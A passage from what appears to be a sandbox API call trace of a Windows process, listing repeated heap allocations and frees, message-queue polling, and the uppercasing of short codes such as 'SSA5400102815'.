returned 0x24b6d28 [0196.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0196.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0196.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0196.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0196.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0196.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.777] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0196.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0196.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0196.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0196.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0196.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0196.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.778] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0196.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0196.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0196.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0196.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0196.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0196.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.779] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.779] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0196.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0196.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.780] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0196.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0196.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.780] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0196.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.781] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.781] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0196.781] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f00 [0196.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0196.781] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0196.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0196.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.782] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.782] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.782] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0196.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0196.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0196.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0196.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0196.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0196.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.784] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.784] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0196.784] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0196.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f00 [0196.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0196.784] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0196.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0196.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.785] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0196.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.785] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0196.785] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.786] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0196.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.786] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0196.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0196.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0196.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0196.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0196.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0196.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0196.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0196.787] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0196.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0196.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0196.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0196.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0196.788] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0196.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0196.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0196.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.788] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0196.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0196.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0196.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0196.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0196.788] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 